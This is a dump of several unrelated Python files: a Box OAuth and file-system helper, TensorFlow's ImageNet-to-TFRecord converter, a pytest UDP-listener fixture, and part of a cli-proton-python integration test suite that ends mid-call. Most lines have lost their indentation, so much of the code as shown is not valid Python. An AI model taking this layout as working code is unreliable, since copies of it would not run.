def hello_world():
app.mp_queue.put(dict(
state=request.args['state'],
code=request.args['code'],
))
return (
'You have successfully authenticated with Box for StopWatch Sync. '
'You can close this window and return to the terminal.')
    config = _config_get()
    oauth = OAuth2(
        client_id=config.get('box_client_ID'),
        client_secret=config.get('box_client_secret'),
store_tokens=_store_tokens,
)
with with_flask_server(app) as q:
auth_url, csrf_token = oauth.get_authorization_url('http://localhost:8080/stopwatch-box')
subprocess.check_call(['open', auth_url])
print('''
Your browser has been opened to visit:
{}
'''.format(auth_url))
request_args = q.get()
# Sleep for a bit to make sure the page renders before the server is killed
time.sleep(0.1)
assert request_args['state'] == csrf_token, 'CSRF token did not match. Expected {} but found {}'.format(
csrf_token, request_args['state'])
oauth.authenticate(request_args['code'])
return oauth
class BoxFileNotFound(Exception):
'''
Error thrown when a file or directory is not found in Box.
'''
pass
class BoxFS(object):
'''
A collection of methods to simplify using the Box API as a file system.
Since each file system access needs to hit the Box API, all methods have
a from_dir option that permits running the command assuming that command
paths should be interpreted relative to the supplied Box Folder object.
This can be used to improve the performance of code and is particularly
beneficial when accessing deep paths in Box.
'''
def __init__(self, client):
self.client = client
def _iter_get_all_items(self, container, limit=100):
'''
Iterator over all the items in this container. Uses pagination API to ensure all files are retrieved.
'''
offset = 0
while True:
items = container.get_items(limit=limit, offset=offset)
# We terminate the loop if this page has no items
if not items:
break
for item in items:
yield item
offset += limit
def _find_item(self, container, name, create_folder_if_missing=False):
'''
Looks for an item in a directory with a matching name. Can optionally create folder if the item is missing.
'''
for item in self._iter_get_all_items(container):
if item['name'] == name:
return item
if create_folder_if_missing:
return container.create_subfolder(name)
else:
raise BoxFileNotFound('Could not find folder {} in {}'.format(name, container))
def _find_path(self, path, from_dir=None, create_folder_if_missing=False):
if not from_dir:
# If no directory to start from is supplied, we start from the root directory.
from_dir = self.client.folder(folder_id='0').get()
item = from_dir
for segment in path.split(os.path.sep):
# HACK we skip empty segments, either because of leading/trailing slash or double slash.
if not segment:
continue
item = self._find_item(item, segment, create_folder_if_missing=create_folder_if_missing)
return item
def find_if_exists(self, path, from_dir=None):
'''
Returns the file or folder at the path. If it does not exist, this returns None.
'''
try:
return self._find_path(path, from_dir=from_dir)
except BoxFileNotFound:
return None
def makedirs(self, path, from_dir=None):
'''
Recursive directory creation function. Does not throw error if leaf folder already exists.
'''
return self._find_path(path, create_folder_if_missing=True, from_dir=from_dir)
def exists(self, path, from_dir=None):
'''
Returns whether the file or directory at this path exists.
'''
try:
self._find_path(path, from_dir=from_dir)
return True
except BoxFileNotFound:
return False
def read(self, path_or_file, from_dir=None):
'''
Return the file contents at a given path or for a supplied box file object.
'''
if isinstance(path_or_file, basestring):
f = self._find_path(path_or_file, from_dir=from_dir)
else:
f = path_or_file
s = StringIO()
f.download_to(s)
return s.getvalue()
def write(self, path, data, from_dir=None, force_create=False):
'''
Write a file's content to a path. Requires the directory to exist.
Returns the file object that was written to.
When force_create is set, this method will always create a new file without checking to see
if one exists. This option exists primarily to be more performant.
'''
folder = self._find_path(os.path.dirname(path), from_dir=from_dir)
basename = os.path.basename(path)
s = StringIO(data)
# In some cases, we prefer to force file creation, as we may be certain the file does not exist.
if force_create:
return folder.upload_stream(s, basename)
try:
# If the file exists, we simply update the contents.
existing = self._find_item(folder, basename)
existing.update_contents_with_stream(s)
return existing
except BoxFileNotFound:
# If the file does not exist, we create the file.
return folder.upload_stream(s, basename)
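# Added illustration (not part of the original module): a small sketch of using
# BoxFS with a folder cached via from_dir, as described in the class docstring.
# The paths are placeholder assumptions.
def _example_boxfs_roundtrip():
    '''Create a folder tree once, then write and read relative to it.'''
    fs = BoxFS(box_client())
    reports_dir = fs.makedirs('stopwatch-sync/reports')
    fs.write('latest.json', '{"status": "ok"}', from_dir=reports_dir)
    return fs.read('latest.json', from_dir=reports_dir)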
if __name__ == '__main__':
config = _config_get()
print('current config', config)
client = box_client()
me = client.user(user_id='me').get()
print('user_login: ' + me['login'])
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
  image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
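# Added illustration (not part of the original converter): a sketch of the
# consumer-side inverse of _convert_to_example, parsing a serialized Example
# back into tensors with the TF 1.x parsing ops. Feature keys mirror the
# writer above; only a subset is shown.
def _example_parse_proto(serialized_example):
  """Parse one serialized Example into encoded image bytes and label."""
  features = tf.parse_single_example(
      serialized_example,
      features={
          'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
          'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
          'image/class/text': tf.FixedLenFeature([], dtype=tf.string,
                                                 default_value=''),
          'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
      })
  return features['image/encoded'], features['image/class/label']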
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, index of the batch handled by this thread, within
      [0, len(ranges)).
    ranges: list of pairs of integers specifying the range of each batch to
      analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
      Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
conftest.py
|
"""Fixtures for testing."""
import socketserver
import threading
import time
import pytest
import charcoal
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""Mixin for handling connections asynchronsly."""
class Listener(socketserver.BaseRequestHandler):
"""Simple UDP listener for testing."""
received = []
def handle(self):
"""Handle incoming UDP messages."""
data = self.request[0].strip()
self.received.extend(data.split(b'\n'))
@classmethod
def load_received(cls, wait=0.01):
"""Yield from the received stats.
But only after a slight delay, otherwise they might not all be there.
"""
time.sleep(wait)
yield from cls.received
cls.received.clear()
@pytest.yield_fixture(scope='session')
def listener():
"""Setup the listener for tests."""
server_address = ('localhost', 8125)
server = ThreadedUDPServer(server_address, Listener)
# ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
yield Listener
server.shutdown()
server.server_close()
@pytest.fixture(scope='function')
def client():
"""Client for tests."""
return charcoal.StatsClient('mystats')
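# Added illustration (not part of the original fixtures): a sketch showing how
# the listener fixture collects datagrams. The raw socket send stands in for
# whatever the client under test emits; no charcoal API is assumed here.
def _example_listener_receives(listener):
    """Any UDP datagram sent to localhost:8125 shows up in Listener.received."""
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(b'mystats.example:1|c', ('localhost', 8125))
    assert b'mystats.example:1|c' in list(listener.load_received())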
|
test_integration.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Red Hat Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" cli-proton-python integration test suite """
from __future__ import print_function, absolute_import
import threading
import subprocess
import ast
import unittest
import random
import time
import sys
import os
import proton
from cli_proton_python import sender, receiver, connector
# Client executor classes
class SenderReceiverTestCase(unittest.TestCase):
""" Sender / Recevier wrapper test class """
recv_messages = None
def setUp(self):
""" set up """
pass
def tearDown(self):
""" tear down """
self.run_receiver()
@staticmethod
def get_sender(opts):
""" instantiates and return sender instance """
return sender.Send(opts)
@staticmethod
def get_receiver(opts):
""" instantiates and return receiver instance """
return receiver.Recv(opts)
@staticmethod
def get_sender_opts():
""" returns the default sender options """
parser = sender.options.SenderOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
return opts
@staticmethod
def get_receiver_opts():
""" returns the default receiver options """
parser = sender.options.ReceiverOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
return opts
def run_sender(self, in_opts=None):
""" executes the sender with given or default options """
opts = in_opts or self.get_sender_opts()
send = self.get_sender(opts)
container = proton.reactor.Container(send)
container.run()
return send.get_messages()
def run_receiver(self, in_opts=None):
""" executes the receiver with given or default options """
opts = in_opts or self.get_receiver_opts()
recv = self.get_receiver(opts)
container = proton.reactor.Container(recv)
container.run()
return recv.get_messages()
class TxSenderReceiverTestCase(SenderReceiverTestCase):
""" transactional Sender / Recevier wrapper test class """
@staticmethod
def get_sender(opts):
return sender.TxSend(opts)
@staticmethod
def get_receiver(opts):
return receiver.TxRecv(opts)
def get_sender_opts(self):
""" returns the default sender options """
opts = super(TxSenderReceiverTestCase, self).get_sender_opts()
opts.tx_size = 1
return opts
def get_receiver_opts(self):
""" returns the default receiver options """
opts = super(TxSenderReceiverTestCase, self).get_receiver_opts()
opts.tx_size = 1
return opts
class P2PTestCase(SenderReceiverTestCase):
""" listener wrapper test class """
def tearDown(self):
pass
def get_sender_opts(self):
""" returns the default receiver options """
opts = super(P2PTestCase, self).get_sender_opts()
opts.broker_url = 'localhost:8888'
return opts
def get_receiver_opts(self):
""" returns the default receiver options """
opts = super(P2PTestCase, self).get_receiver_opts()
opts.broker_url = 'localhost:8888'
opts.recv_listen = True
return opts
def run_receiver(self, in_opts=None):
""" executes the receiver with given or default options """
self.recv_messages = super(P2PTestCase, self).run_receiver(in_opts)
class ConnectorTestCase(unittest.TestCase):
""" Connector wrapper test class """
@staticmethod
def get_connector_opts():
""" returns the default connector options """
parser = sender.options.ConnectorOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
opts.obj_ctrl = 'CESR'
return opts
def run_connector(self, in_opts=None):
""" executes the connector with given or default options """
opts = in_opts or self.get_connector_opts()
conn = connector.Connector(opts)
container = proton.reactor.Container(conn)
container.run()
return conn.get_messages()
class CommandLineTestCase(unittest.TestCase):
""" command line clients wrapper test class """
@staticmethod
def run_client(cli_path, opts, wait=True):
"""
executes the connector with given or default options
return client stdout or client instance when running on background
"""
cli = subprocess.Popen([cli_path] + (opts or []), stderr=subprocess.STDOUT,
stdout=subprocess.PIPE, universal_newlines=True)
if not wait:
return cli
cli.wait()
stdout = [l.strip() for l in cli.stdout]
cli.stdout.close()
return stdout
def run_sender(self, in_opts=None):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/sender.py', in_opts)
def run_receiver(self, in_opts=None, in_wait=True):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/receiver.py', in_opts, in_wait)
def run_connector(self, in_opts=None):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/connector.py', in_opts)
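# Added illustration (not part of the original suite): a sketch of invoking the
# sender CLI through CommandLineTestCase.run_client. The flag spellings are
# assumptions derived from the option names (broker_url, count, log_msgs) used
# elsewhere in this module.
def _example_run_cli_sender(case):
    """ runs the sender executable once against a local broker (sketch) """
    return case.run_client('../cli_proton_python/sender.py',
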